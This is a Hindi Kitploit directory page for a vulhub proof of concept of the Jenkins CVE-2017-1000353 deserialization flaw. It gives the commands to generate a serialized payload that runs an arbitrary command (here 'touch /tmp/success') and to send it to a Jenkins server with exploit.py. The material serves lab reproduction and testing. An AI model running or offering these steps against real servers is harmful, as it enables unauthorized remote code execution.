Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-1000353 — jenkins CVE-2017-1000353 POC | Kitploit
उपकरण/GitHubGitHub/vulhub/cve-2017-1000353
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubvulhub/cve-2017-1000353

CVE-2017-1000353

jenkins CVE-2017-1000353 POC

रिपॉजिटरी देखें
576221 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-1000353 POC

Jenkins CVE-2017-1000353 को कैसे reproduce करें?

इस repository को clone करें, निम्न command के साथ पहले से बने payload jenkins_poc.ser का उपयोग करें:

root@kitploit:~
python exploit.py http://your-ip:8080 jenkins_poc.ser

फिर touch /tmp/success execute हो जाएगा।

Java संस्करण आवश्यकताएँ

Important: Payload generation Java version पर निर्भर करता है। इसे openjdk:8u292 के साथ सफलतापूर्वक test किया गया है। अन्य Java versions payload generation और exploitation के लिए ठीक से काम नहीं कर सकते हैं।

payload jenkins_poc.ser कैसे generate करें?

CVE-2017-1000353-SNAPSHOT-all.jar डाउनलोड करें।

root@kitploit:~
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
टूल डाउनलोड करें

यदि आप Docker का उपयोग कर रहे हैं, तो compatibility सुनिश्चित करने के लिए निम्न command का उपयोग कर सकते हैं:

root@kitploit:~
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Reference

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353